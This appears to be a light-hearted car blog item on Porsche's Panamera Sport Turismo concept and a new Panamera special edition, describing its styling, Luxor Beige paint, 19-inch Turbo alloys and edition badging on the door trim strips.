Actually yes! The new Panamera Sport Turismo (a concept model nodding at a possible design direction for Porsche in the future) proved a big hit with its elegantly sloping rear end, re-chiselled jawline and botox-ed headlights, and the new rear facing cameras in lieu of traditional wing mirrors. So great was the response apparently that Porsche felt it a good time to release its new Panamera Premium Edition.
Porsche walks us through this model – and yes, there is a Panamera 4 version – by focusing on the redesigned grilles, platinum silver metallic rear diffuser, and tightened bodylines. You’ll notice that they’ve gone suspiciously quiet all of a sudden about the powerplant (which we assume is the same six-cylinder beast as standard), but far-be-it for us to draw attention to that.
Instead, we’re quite taken with the new Luxor Beige paint (one of five exterior finishes available) and cheeky 19” Panamera Turbo alloys. “All well and good”, we hear you cry, “but what good is that without some kind of ‘Platinum Edition’ insignia stencilled on the bodywork?” Don’t worry. The front door trim strips have got you covered.
